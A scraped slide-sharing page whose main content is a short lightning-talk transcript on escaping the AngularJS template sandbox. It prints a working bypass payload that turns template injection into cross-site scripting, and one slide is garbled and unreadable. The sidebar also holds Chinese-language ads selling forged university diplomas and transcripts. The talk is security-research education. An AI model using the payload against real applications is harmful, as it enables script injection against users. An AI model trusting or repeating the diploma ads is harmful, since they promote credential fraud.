Zeronights 2016 - Automating iOS blackbox security scanningSynack The document discusses several tools for testing iOS applications, including ChaoticMarch, Machshark, and Objc_trace. ChaoticMarch is described as a tool for simulating user interactions and automating testing of an iOS app. It allows writing Lua scripts to interact with the UI and regulate test execution speed. Machshark is a tool for analyzing Mach IPC messages and Objc_trace allows tracing Objective-C method calls. The document also provides examples of Lua scripts for ChaoticMarch that find and interact with UI elements to automate tasks like filling fields and logging in.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.
Ad
Similar to Breaking AngularJS Javascript sandbox (6)
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE The document is a presentation by Mario Heiderich discussing the security aspects of AngularJS, a popular JavaScript framework. It examines AngularJS's self-declared security features and highlights various vulnerabilities through detailed attack vectors, such as the sandbox, sanitizer, and CSP mode. The talk emphasizes the significant risks associated with older AngularJS versions and the importance of following security best practices to mitigate these risks.
How Secure Is AngularJS?
How Secure Is AngularJS?Ksenia Peguero Ksenia Peguero gave a presentation on AngularJS security. She discussed how AngularJS addresses some common vulnerabilities like XSS and CSRF. However, she noted some issues remain, such as DOM-XSS vulnerabilities in Angular elements and third-party plugins. She demonstrated template injection and sandbox bypass issues. Her conclusion was that AngularJS provides good security when used properly, but one should not rely on the sandbox and should avoid mixing server-side and client-side templates. She advised checking plugins for issues and using the latest versions.
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck The document discusses the security of AngularJS applications, emphasizing the importance of being aware of cross-site scripting (XSS) vulnerabilities and how to protect against them. It outlines essential rules for securing AngularJS apps, including not combining templates with user-supplied data, properly sanitizing inputs, and leveraging Content Security Policy (CSP) to mitigate risks. Additionally, it highlights the need for ongoing education and resources available for web security training.
Angular Js
Angular JsKnoldus Inc. The document provides an overview of AngularJS, a JavaScript framework by Google for building single-page applications (SPAs) that focuses on dynamic web development with features like data binding and templating. It explains the framework's benefits, including simplifying development and enhancing testability, while clarifying what AngularJS is not, such as a JavaScript library or plugin. Additionally, it discusses key concepts like directives, factories, and the general structure for setting up an AngularJS application.
AngularJS: A framework to make your life easier
AngularJS: A framework to make your life easierWilson Mendes The document presents a comprehensive overview of AngularJS, highlighting its benefits for web development such as two-way data binding, modularity through directives, and ease of integration with external libraries. It compares AngularJS with other frameworks like jQuery and Backbone, demonstrating AngularJS's efficiency in code reduction and productivity. Additionally, it provides various resources for further learning and successful case studies using AngularJS.
Angular js introduction
Angular js introductionThirumal737 AngularJS is an open-source JavaScript framework for building dynamic web applications. It uses MVC architecture and allows developers to create rich client-side web applications using two-way data binding and directives. Some key features include templating, data binding, dependency injection, testing, and extensibility through custom directives. A basic "Hello World" AngularJS program binds an expression to an HTML element using ng-controller and ng-app directives to output a greeting.
Ad
Recently uploaded (20)
Logging and Automated Alerting Webinar.pdf
Logging and Automated Alerting Webinar.pdfControlCase Join us for an exclusive webinar on Logging and Automated Alerting — your key to simplifying compliance and strengthening security.
Discover how ControlCase helps organizations move beyond the checklist to achieve real-time monitoring, centralized log management, and faster incident response with minimal internal effort.
📅 Gain insights into:
• Emerging risks and compliance requirements
• How automated alerting reduces downtime
• The architecture behind our proactive LAAS solution
• Real-world results that boost productivity and performance
🎙 Hosted by our cybersecurity experts Chad Leedy and Elswick Lai.
Secure your spot today and learn how to turn compliance into a competitive advantage.
👉 [Insert Registration Link]
#Cybersecurity #Compliance #Logging #Alerting #ControlCase #CaaS #ITSecurity #Webinar
Make DDoS expensive for the threat actors
Make DDoS expensive for the threat actorsAPNIC Awal Haolader, Network Analyst / Technical Trainer at APNIC, delivered a presentation titled 'Make DDoS expensive for the threat actors' at Phoenix Summit 2025 held in Dhaka, Bangladesh from 19 to 24 May 2025.
history of internet in nepal Class-8 (sparsha).pptx
history of internet in nepal Class-8 (sparsha).pptxSPARSH508080 It tells about the history of computers and internet. Explained breifly
BitRecover OST to PST Converter Software
BitRecover OST to PST Converter Softwareantoniogosling01 BitRecover OST to PST Converter is a powerful tool designed to convert inaccessible or orphaned OST files into Outlook PST format. It ensures complete data recovery including emails, contacts, calendars, and attachments. The software supports both ANSI and Unicode OST files and works with all Outlook versions. With a user-friendly interface and advanced filtering options, it's ideal for professionals needing quick and accurate OST to PST conversion.
https://www.bitrecover.com/ost-to-pst/
DDoS in India, presented at INNOG 8 by Dave Phelan
DDoS in India, presented at INNOG 8 by Dave PhelanAPNIC Dave Phelan, Senior Network Analyst & Technical Trainer at APNIC, presented on 'DDoS in India' at INNOG 8 held in conjunction with the 2nd India ISP Conclave held in Delhi, India from 23 to 28 May 2025.
inside the internet - understanding the TCP/IP protocol
inside the internet - understanding the TCP/IP protocolshainweniton02 Key factors on TCP/IP protocol
BASICS OF SAP _ ALL ABOUT SAP _WHY SAP OVER ANY OTHER ERP SYSTEM
BASICS OF SAP _ ALL ABOUT SAP _WHY SAP OVER ANY OTHER ERP SYSTEMAhmadAli716831 BASICS OF SAP - WHY SAP
Transmission Control Protocol (TCP) and Starlink
Transmission Control Protocol (TCP) and StarlinkAPNIC Geoff Huston, APNIC Chief Scientist, delivered a remote presentation on 'TCP and Starlink' at INNOG 8 held in conjunction with the 2nd India ISP Conclave held in Delhi, India from 23 to 28 May 2025.
Global Networking Trends, presented at the India ISP Conclave 2025
Global Networking Trends, presented at the India ISP Conclave 2025APNIC Jia Rong Low, APNIC Director General, presented on 'Global Networking Trends' at INNOG 8 held jointly with the India ISP Conclave 2025 held in Delhi, India from 23 to 28 May 2025.
Paper: The World Game (s) Great Redesign.pdf
Paper: The World Game (s) Great Redesign.pdfSteven McGee Paper: The REAL QFS - DeFi Quantum Financial System structured data AI symbols exchange derived from Net Centric Warfare, Battlefield Digitization for the World Game (s) Great Reset - Redesign: "End state = "in the beginning state" "Start at end state & work backwards" FutureMan
最新版加拿大奎斯特大学毕业证(QUC毕业证书)原版定制
最新版加拿大奎斯特大学毕业证(QUC毕业证书)原版定制taqyed 2025年极速办奎斯特大学毕业证【q薇1954292140】学历认证流程奎斯特大学毕业证加拿大本科成绩单制作【q薇1954292140】海外各大学Diploma版本,因为疫情学校推迟发放证书、证书原件丢失补办、没有正常毕业未能认证学历面临就业提供解决办法。当遭遇挂科、旷课导致无法修满学分,或者直接被学校退学,最后无法毕业拿不到毕业证。此时的你一定手足无措,因为留学一场,没有获得毕业证以及学历证明肯定是无法给自己和父母一个交代的。
【复刻奎斯特大学成绩单信封,Buy Quest University Canada Transcripts】
购买日韩成绩单、英国大学成绩单、美国大学成绩单、澳洲大学成绩单、加拿大大学成绩单(q微1954292140)新加坡大学成绩单、新西兰大学成绩单、爱尔兰成绩单、西班牙成绩单、德国成绩单。成绩单的意义主要体现在证明学习能力、评估学术背景、展示综合素质、提高录取率,以及是作为留信认证申请材料的一部分。
奎斯特大学成绩单能够体现您的的学习能力,包括奎斯特大学课程成绩、专业能力、研究能力。(q微1954292140)具体来说,成绩报告单通常包含学生的学习技能与习惯、各科成绩以及老师评语等部分,因此,成绩单不仅是学生学术能力的证明,也是评估学生是否适合某个教育项目的重要依据!
我们承诺采用的是学校原版纸张(原版纸质、底色、纹路)我们工厂拥有全套进口原装设备,特殊工艺都是采用不同机器制作,仿真度基本可以达到100%,所有成品以及工艺效果都可提前给客户展示,不满意可以根据客户要求进行调整,直到满意为止!
【主营项目】
一.奎斯特大学毕业证【q微1954292140】奎斯特大学成绩单、留信认证、使馆认证、教育部认证、雅思托福成绩单、学生卡等!
二.真实使馆公证(即留学回国人员证明,不成功不收费)
三.真实教育部学历学位认证(教育部存档!教育部留服网站永久可查)
四.办理国外各大学文凭(一对一专业服务,可全程监控跟踪进度)
最新版美国特拉华大学毕业证(UDel毕业证书)原版定制
最新版美国特拉华大学毕业证(UDel毕业证书)原版定制taqyea 2025原版特拉华大学毕业证书pdf电子版【q薇1954292140】美国毕业证办理UDel特拉华大学毕业证书多少钱?【q薇1954292140】海外各大学Diploma版本,因为疫情学校推迟发放证书、证书原件丢失补办、没有正常毕业未能认证学历面临就业提供解决办法。当遭遇挂科、旷课导致无法修满学分,或者直接被学校退学,最后无法毕业拿不到毕业证。此时的你一定手足无措,因为留学一场,没有获得毕业证以及学历证明肯定是无法给自己和父母一个交代的。
【复刻特拉华大学成绩单信封,Buy University of Delaware Transcripts】
购买日韩成绩单、英国大学成绩单、美国大学成绩单、澳洲大学成绩单、加拿大大学成绩单(q微1954292140)新加坡大学成绩单、新西兰大学成绩单、爱尔兰成绩单、西班牙成绩单、德国成绩单。成绩单的意义主要体现在证明学习能力、评估学术背景、展示综合素质、提高录取率,以及是作为留信认证申请材料的一部分。
特拉华大学成绩单能够体现您的的学习能力,包括特拉华大学课程成绩、专业能力、研究能力。(q微1954292140)具体来说,成绩报告单通常包含学生的学习技能与习惯、各科成绩以及老师评语等部分,因此,成绩单不仅是学生学术能力的证明,也是评估学生是否适合某个教育项目的重要依据!
我们承诺采用的是学校原版纸张(原版纸质、底色、纹路)我们工厂拥有全套进口原装设备,特殊工艺都是采用不同机器制作,仿真度基本可以达到100%,所有成品以及工艺效果都可提前给客户展示,不满意可以根据客户要求进行调整,直到满意为止!
【主营项目】
一、工作未确定,回国需先给父母、亲戚朋友看下文凭的情况,办理毕业证|办理文凭: 买大学毕业证|买大学文凭【q薇1954292140】特拉华大学学位证明书如何办理申请?
二、回国进私企、外企、自己做生意的情况,这些单位是不查询毕业证真伪的,而且国内没有渠道去查询国外文凭的真假,也不需要提供真实教育部认证。鉴于此,办理美国成绩单特拉华大学毕业证【q薇1954292140】国外大学毕业证, 文凭办理, 国外文凭办理, 留信网认证
Breaking AngularJS Javascript sandbox
- 1. Breaking ngularJS Javascript sandbox A lightning talk by avlidienbrunn
- 2. What is AngularJS? And where’s the sandbox? • Javascript framework for building single page web applications. • Mustache style templates: Having <h1>{{1+2+3}}</h1> anywhere in Angular HTML app will render <h1>6</h1> • Template expressions are evaluated with Javascript • Template expression Javascript is sandboxed - It can’t reach [object Window] or DOM • If we could access dangerous objects from templates, we could XSS any AngularJS app that prints user data in Angular bound HTML
- 3. Executing JS… From JS • eval() - Unavailable under window • document.write - Unavailable under document • location=“javascript:” - Unavailable under document • Function(“code”)() - Unavailable under blacklist • What else is there?
- 4. The bypass toString.constructor.prototype.toString= toString.constructor.prototype.call; [“a”,"alert(1)"].sort(toString.constructor) alert(1)
- 5. The how if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){ 1){ element2) toString= == 1..toString()){ == 1){ toString.//{{sort toString.element constructor.constructor.as bigger prototype.prototype.call; toString= }else if((function(["if(… a","toString.alert(== a){0){ 1)"].alert(constructor.sort(1)}).Function); call() prototype.== 1..toString()){ call; //sort element as same }else{ //sort element as smaller } //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller } toString.constructor); [“a”,”alert(1)”].sort(toString.constructor)}} alert(1)
- 6. That’s all folks! + = A lightning talk by avlidienbrunn